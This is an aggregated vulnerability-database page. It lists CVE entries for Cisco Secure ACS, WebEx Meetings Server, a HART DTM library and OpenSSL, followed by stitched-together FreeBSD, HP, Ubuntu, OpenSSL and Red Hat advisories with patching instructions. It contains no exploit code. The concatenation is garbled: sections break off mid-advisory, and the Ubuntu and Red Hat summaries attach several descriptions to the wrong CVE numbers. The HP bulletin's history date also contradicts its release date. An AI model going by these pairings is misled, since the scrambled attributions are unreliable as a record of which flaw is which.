VARIoT IoT vulnerabilities database
| VAR-201501-0329 | CVE-2014-8028 | Cisco Secure Access Control System of Web Cross-site scripting vulnerability in the framework |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web framework in Cisco Secure Access Control System (ACS) allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, aka Bug ID CSCuq79019.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
These issues are being tracked by Cisco Bug ID CSCuq79019. The system can respectively control network access and network device access through RADIUS and TACACS protocols
| VAR-201501-0330 | CVE-2014-8029 | Cisco Secure Access Control System of Web Open redirect vulnerability in interface |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in the web interface in Cisco Secure Access Control System (ACS) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an unspecified parameter, aka Bug ID CSCuq74150. Vendors have confirmed this vulnerability Bug CSCuq74150 It is released as. Supplementary information : CWE Vulnerability type by CWE-601: URL Redirection to Untrusted Site ( Open redirect ) Has been identified. http://cwe.mitre.org/data/definitions/601.htmlBy any third party through any unspecified parameters Web You may be redirected to a site and run a phishing attack.
An attacker can leverage this issue to conduct phishing attacks; other attacks are possible.
This issue is being tracked by Cisco Bug ID CSCuq74150. The system can respectively control network access and network device access through RADIUS and TACACS protocols
| VAR-201501-0331 | CVE-2014-8030 | Cisco WebEx Meetings Server of sendPwMail.do Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in sendPwMail.do in Cisco WebEx Meetings Server allows remote attackers to inject arbitrary web script or HTML via the email parameter, aka Bug ID CSCuj40381.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuj40381. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
| VAR-201501-0332 | CVE-2014-8031 | Cisco WebEx Meetings Server Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Meetings Server allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuj40456.
An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
This issue is being tracked by Cisco Bug ID CSCuj40456. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
| VAR-201501-0333 | CVE-2014-8032 | Cisco WebEx Meetings Server of OutlookAction LI Vulnerable to obtaining important encrypted password information |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The OutlookAction LI in Cisco WebEx Meetings Server allows remote authenticated users to obtain sensitive encrypted-password information via unspecified vectors, aka Bug IDs CSCuj40453 and CSCuj40449.
An attacker can leverage this issue to obtain sensitive information that may aid in further attacks.
This issue is being tracked by Cisco bug IDs CSCuj40453 and CSCuj40449. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution. A security vulnerability exists in CWMS's OutlookAction LI
| VAR-201501-0334 | CVE-2014-8033 | Cisco WebEx Meetings Server of play/modules Vulnerability in components gaining administrator access |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The play/modules component in Cisco WebEx Meetings Server allows remote attackers to obtain administrator access via crafted API requests, aka Bug ID CSCuj40421.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks.
This issue is tracked by Cisco Bug ID CSCuj40421. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution. A security vulnerability exists in the play/modules component of CWMS
| VAR-201501-0399 | CVE-2014-9191 | CodeWrights 'HART DTM' Library Local Denial of Service Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The CodeWrights HART Device Type Manager (DTM) library in Emerson HART DTM before 1.4.181 allows physically proximate attackers to cause a denial of service (DTM outage and FDT Frame application hang) by transmitting crafted response packets on the 4-20 mA current loop. HART Device Type Manager is a device type manager. CodeWrights 'HART DTM' Library has a local denial of service vulnerability that can be exploited by local attackers to initiate a denial of service attack. CodeWrights 'HART DTM' library is prone to a denial-of-service vulnerability.
An attacker may exploit this issue to cause denial-of-service conditions
| VAR-201501-0328 | CVE-2014-8027 | Cisco Secure Access Control System of RBAC Vulnerability of obtaining network device administrator privileges in components |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
The RBAC component in Cisco Secure Access Control System (ACS) allows remote authenticated users to obtain Network Device Administrator privileges for Create, Delete, Read, and Update operations via crafted HTTP requests, aka Bug ID CSCuq79034. Cisco Secure Access Control Server is prone to a privilege-escalation vulnerability.
A remote attacker can exploit this issue to gain elevated privileges on an affected device.
This issue is being tracked by Cisco Bug ID CSCuq79034. RBAC is one of the role-based access control components
| VAR-201501-0436 | CVE-2014-3572 | OpenSSL ‘ ssl3_get_key_exchange 'Function Encryption Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message. OpenSSL is prone to a security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions. This may lead to other attacks. The Common Vulnerabilities and Exposures project
identifies the following issues:
CVE-2014-3569
Frank Schmirler reported that the ssl23_get_client_hello function in
OpenSSL does not properly handle attempts to use unsupported
protocols.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc.
CVE-2014-8275
Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project
and Konrad Kraszewski of Google reported various certificate
fingerprint issues, which allow remote attackers to defeat a
fingerprint-based certificate-blacklist protection mechanism.
For the stable distribution (wheezy), these problems have been fixed in
version 1.0.1e-2+deb7u14.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
For the unstable distribution (sid), these problems have been fixed in
version 1.0.1k-1.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>. Background
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-3569] This does not affect
FreeBSD's default build. [CVE-2014-3570]
III. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04604357
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04604357
Version: 1
HPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent
running OpenSSL, Remote Disclosure of Information, Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-03-19
Last Updated: 2015-03-19
Potential Security Impact: Remote disclosure of information, unauthorized
access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO
Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:
The SSL vulnerability known as "FREAK", which could be exploited remotely to
allow disclosure of information.
Other vulnerabilities which could be exploited remotely resulting in
unauthorized access.
References:
CVE-2014-3570
CVE-2014-3572
CVE-2014-8275
CVE-2015-0204
SSRT101987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
CVE-2014-3572 and CVE-2015-0204
HP IceWall MCRP Version 2.1 and 3.0
HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0
HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version
10.0
HP IceWall Federation Agent Version 3.0
CVE-2014-3570 and CVE-2014-8275
HP IceWall MCRP v2.1, v3.0
HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
HP IceWall SSO Agent v8.0 and v8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates and workaround instructions to
resolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and
Federation Agent. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could
be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP
IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to
the OpenSSL library bundled with the OS, and then follow the instructions in
step 3.
Documents are available at the following location with instructions to
switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,
and SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please
download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
3. For HP IceWall products running on RHEL and are using the OS bundled
OpenSSL, RHEL has provided patch or mitigation instructions at the following
location:
https://access.redhat.com/articles/1369543
Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch
for OpenSSL from the following location:
https://access.redhat.com/security/cve/CVE-2014-8275
4. For IceWall products running on HP-UX which are using the OS bundled
OpenSSL, please apply the HP-UX OpenSSL update from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?produ
ctNumber=OPENSSL11I
WORKAROUND INSTRUCTIONS
HP recommends the following information to protect against potential risk
from CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
- If possible, do not use the SHOST setting which allows IceWall SSO
Dfw or MCRP to use SSL/TLS protocol to back-end web servers.
- If possible, do not use EXPORT-grade ciphers on the back-end web
servers.
HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch
release 2)
- If possible, do not use the LDAPSSL setting which allows IceWall SSO
Certd to connect to the LDAP server using SSL/TLS protocol.
- If possible, do not use EXPORT-grade ciphers on the LDAP server.
IceWall Federation Agent
- If possible, use "bindings:HTTP-POST" instead of
"bindings:HTTP-Artifact" setting in the service provider meta file. The
"bindings:HTTP-POST" setting would disable IWFA to use SSL for communicating
with IdP server.
Note: The HP IceWall product is only available in Japan.
HISTORY
Version:1 (rev.1) - 19 March 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. ============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue
only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes. OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
DH client certificates accepted without verification [Server] (CVE-2015-0205)
=============================================================================
Severity: Low
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
